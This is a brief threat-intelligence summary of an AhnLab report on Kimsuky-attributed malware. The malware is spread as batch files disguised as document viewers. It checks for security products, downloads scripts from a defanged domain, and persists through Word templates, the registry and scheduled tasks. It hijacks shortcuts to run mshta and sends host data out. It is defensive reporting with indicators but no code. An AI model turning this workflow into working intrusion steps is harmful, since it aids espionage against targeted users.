AhnLab reports that malware assessed as Kimsuky activity was distributed as batch files disguised as document viewers, likely via email, with decoy Google Drive/Docs documents about military and Korean unification topics. The BAT file used WMIC to check installed security products and downloaded different scripts from joongang[.]site depending on Kaspersky, Avast, AhnLab V3, or other process matches. Follow-on components replaced Word's Normal.dotm, registered VBS persistence through the registry, startup folder, or a scheduled task, and modified browser/email shortcuts so user launches could execute attacker-controlled commands such as mshta. The scripts also collected host details including battery and process information and sent them to joongang[.]site, while AhnLab listed related BAT/VBS detections and representative infrastructure such as joongang[.]site and namsouth[.]com.